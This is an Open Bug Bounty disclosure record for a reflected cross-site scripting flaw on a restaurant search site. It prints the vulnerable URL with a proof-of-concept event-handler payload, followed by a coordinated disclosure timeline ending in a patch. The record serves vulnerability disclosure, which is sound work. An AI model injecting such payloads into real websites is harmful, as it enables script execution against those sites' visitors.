buscorestaurantes.com XSS vulnerability

2016-02-23T11:50:00
ID OBB:137316
Type openbugbounty
Reporter dim0k
Modified 2016-05-18T04:24:00

Description

Vulnerable URL:
http://www.buscorestaurantes.com/search_results.php?keywords='onmouseover='confirm(/XSSPOSED/)&submit;_button=buscar&from;_pmd=ad34dd1ffacecf5828c62dcf7a9b1f37⊥_check=9235766303
Details:

Description| Value
---|---
Patched:| Yes, at
Vulnerability type:| XSS
Vulnerability status:| Publicly disclosed
Alexa Rank| 28795
Google Pagerank| 3
VIP website status:| Yes
Check buscorestaurantes.com SSL connection:| (Grade: F)

Coordinated Disclosure Timeline:

Description| Value
---|---
Vulnerability submitted via Open Bug Bounty| 23 February, 2016 11:50 GMT
Generic security notifications sent to website owner| 23 February, 2016 11:52 GMT
Notification sent to subscribers (without technical details)| 23 February, 2016 14:17 GMT
Vulnerability details disclosed by researcher| 17 May, 2016 12:11 GMT
Vulnerability patched by the website owner| 18 May, 2016 04:24 GMT